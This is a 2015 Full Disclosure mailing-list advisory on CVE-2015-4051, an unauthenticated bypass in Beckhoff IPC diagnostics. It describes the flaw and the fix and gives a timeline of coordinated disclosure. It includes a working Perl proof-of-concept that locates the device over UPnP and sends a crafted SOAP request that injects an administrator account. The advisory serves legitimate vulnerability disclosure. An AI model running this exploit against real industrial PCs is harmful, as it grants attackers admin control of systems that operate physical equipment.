[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] [CVE-2015-4051]: Beckhoff IPC diagnostics < 1.8 : Authentication bypass
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] [CVE-2015-4051]: Beckhoff IPC diagnostics < 1.8 : Authentication bypass
- From: The Security Factory <release@xxxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 4 Jun 2015 08:31:42 +0000
Beckhoff IPC diagnostics < 1.8 : Authentication bypass
======================================================
CVE number: CVE-2015-4051
Permalink:
http://www.thesecurityfactory.be/permalink/beckhoff-authentication-bypass.html
Vendor advisory:
http://ftp.beckhoff.com/download/document/IndustPC/Advisory-2015-001.pdf
-- Info --
Beckhoff IPC diagnostics is support software that is preinstalled on all
Beckhoff Industrial PCís (and PLCís) that are running an embedded Microsoft
Windows operating system. The software enables various system diagnostics
options, as well the possibility to alter various settings.
-- Affected version --
IPC Diagnostics < Version 1.8
-- Vulnerability details --
Due to a lack of authentication when making a call to /upnpisapi, an
unauthenticated attacker is able to perform a variety of actions on the system
by sending a specially crafted packet. These actions include rebooting the
device or injecting a new user that has admin access rights on both the
underlaying embedded Windows and webserver. Further access can be obtained on
the system by connecting to SMB / FTP / telnet / Ö using the injected user.
-- PoC --
#!/usr/bin/perl
use IO::Socket::INET;
use strict;
use warnings;
if ($#ARGV < 0) { print "Usage: $0 ip\n"; exit(-1); }
system("clear");
print "Connecting to UPNP\n";
my $upnp_req = "M-SEARCH * HTTP/1.1\r\n" .
"Host:239.255.255.250:1900\r\n" .
"ST:upnp:rootdevice\r\n" .
"Man:\"ssdp:discover\"\r\n" .
"MX:3\r\n" .
"\r\n";
my $ip = $ARGV[0];
my $socket = new IO::Socket::INET ( PeerAddr => "$ip:1900", Proto => 'udp') or
die "ERROR in Socket Creation : $!\n";
$socket->send($upnp_req);
my $usn;
while (1)
{
my $data = <$socket>;
print "$data";
# Get the USN
if ($data =~ /^USN:/) {
print "\nUSN seen. Trying to get it\n";
($usn) = $data =~ /^USN:uuid:(.*)::upnp:rootdevice/;
last;
}
}
print "\n\nUSN found: $usn\n\n";
print "Creating curl command\n\n";
my $curl_command = "curl -i -s -k -X 'POST' " .
" -H 'SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write' -H
'Content-Type: text/xml; charset=utf-8' " .
" --data-binary
\$'00-1340079872KAAAAAYAAAAAAAAAEgAAAEluamVjdHRoZVNlY3VyaXR5RmFjdG9yeQAA' " .
" 'http://"; . $ip . ":5120/upnpisapi?uuid:" . $usn .
"+urn:beckhoff.com:serviceId:cxconfig'";
print "Executing Curl command\n\n";
system($curl_command);
print "User: Inject, Password: theSecurityFactory should be injected";
-- Solution --
This issue has been fixed as of version 1.8.1.0
-- Timeline --
2015-27-01 Vulnerability discovery and creation of PoC
2015-28-01 Vulnerability responsibly reported to vendor
2015-13-02 Second disclosure to vendor
2015-13-02 Vendor response and acknowledgement of vulnerability
2015-15-04 - 2015-15-05 Various communications
2015-21-05 Vendor update and advisory release
2015-04-06 Advisory published in coordination with vendor
-- Credits --
Frank Lycops
Frank.lycops [at] thesecurityfactory.be
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/